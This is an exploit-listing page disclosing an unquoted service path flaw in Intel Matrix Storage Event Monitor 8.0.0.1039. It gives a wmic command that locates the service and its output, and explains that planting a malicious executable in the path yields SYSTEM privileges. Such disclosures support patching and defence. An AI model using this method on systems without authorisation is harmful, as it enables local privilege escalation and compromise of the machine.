Intel(r) matrix storage event monitor x86 8.0.0.1039 iaantmon unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-01-05 |
Type : local |
Platform : windows
This exploit / vulnerability Intel(r) matrix storage event monitor x86 8.0.0.1039 iaantmon unquoted service path is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Intel(R) Matrix Storage Event Monitor x86 8.0.0.1039 - 'IAANTMON' Unquoted Service Path
# Date: 2021-01-04
# Exploit Author: Geovanni Ruiz
# Vendor Homepage: https://www.intel.com
# Software Version: 8.0.0.1039
# File Version: 8.0.0.1039
# Tested on: Microsoft® Windows Vista Business 6.0.6001 Service Pack 1 x64es
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%IAANTMON%"' get name, displayname,
pathname, startmode, startname
DisplayName Name PathName
StartMode StartName
Intel(R) Matrix Storage Event Monitor IAANTMON C:\Program Files
(x86)\Intel\Intel Matrix Storage Manager\IAANTMon.exe Auto
LocalSystem
To exploit this vulnerability an attacker requires to drop a malicious
executable into the service path undetected by the OS in order
to gain SYSTEM privileges.
Intel(r) matrix storage event monitor x86 8.0.0.1039 iaantmon unquoted service path